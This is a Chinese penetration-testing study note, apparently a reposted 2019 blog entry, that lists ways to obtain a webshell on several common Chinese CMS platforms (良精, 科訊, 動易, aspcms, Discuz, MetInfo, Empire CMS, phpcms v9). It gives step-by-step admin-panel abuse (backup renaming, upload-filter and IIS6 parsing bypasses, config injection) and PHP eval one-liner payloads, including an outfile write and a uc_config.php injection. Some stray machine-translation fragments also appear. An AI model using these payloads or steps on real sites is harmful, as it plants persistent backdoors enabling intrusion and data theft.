滲透測試學習二十3、常見cms拿shell

時間 2019-11-07

標籤滲透測試學習二十常見 cms shell 欄目 CMS 简体版

原文原文鏈接

常見cmsphp

良精、科訊、動易、aspcms、dzcss

米拓cms、phpcms200八、帝國cms、phpv9html

phpweb、dedecmsweb

良精shell

方法：數據庫

一、數據庫備份拿shell安全

上傳圖片——點擊數據庫備份——改成腳本格式——添加帳號，講一句話添加在用戶名處——備份——改成腳本格式post

二、雙文件上傳網站

三、配置插馬spa

四、修改文件上傳類型直接上傳

科訊（用IE）

/admin/admin.asp 後臺路徑

一、利用解析漏洞

二、設置——網站基本信息設置——默認容許上傳文件類型，將asp改成aaspsp（會將asp替換爲空）

內容——圖片添加——上傳時改成aaspsp

設置——基本設置——其它選項——通用頁面目錄——html/a.asp/（目錄解析）——標籤——自定義靜態標籤——增長靜態標籤——插入一句話——自定義頁面——生成一個頁面，會在a.asp目錄下

動易（學校，簡單的企業）

在網站配置中插馬——鏈接inc/config.asp文件

數據庫備份

雙文件上傳

aspcms

界面風格——編輯模板/css文件（利用IIS6.0解析漏洞）——添加——文件系統——a.asp;html——內容插入一句話

拓展功能——幻燈片設置——插馬

uckey或利用插件上傳（常見的網站discuz x2.5）

後臺 admin.php或cu_server

站長——ucenter設置（經過配置插馬，閉合拿shell）

站長——數據庫備份（或短文件漏洞）

米拓cms

metinfo 5.3.18 install/phpinfo.php——裏面能找到網站根目錄

後臺 admin/index.php （上傳圖片馬包含文件）

後臺——安全——數據庫備份——下載——打開（txt）——在完整的一句話後面寫入新的一句話（select 「<?php @eval($_POST[A]);?>」 into outfile ‘網站根目錄，路徑寫成Linux路徑’）——恢復（通常在晚上沒有數據交互的時候再作）

權限要求很高

帝國cms

empircms-v6.6

127.0.0.1/e/install

後臺：127.0.0.1/e/admin/index.php

後臺——數據表與系統模型——管理數據表——管理系統表模型——導入系統模型（要導.mod的文件）——<?fputs(fopen(「cnm.php」,」w」),」<?eval(\$_POST[cmd];)?>」)?>保存爲mod文件，文件名爲aa.php.mod——記住導入的目錄路徑/e/admin/cnm.php

注意：導入時候可能會有waf，能夠在腳本中加入免殺的一句話

phpv9

phpcms_v9.6.3_GBK

127.0.0.1/install

後臺——界面——模板風格——詳情列表——search——編輯插馬

後臺——phpsso——系統管理——ucenter配置——uc_config.php中 ‘);eval($_post[a]);#

後臺——內容——專題 phpv9低權限拿shell

phpweb

dedecmd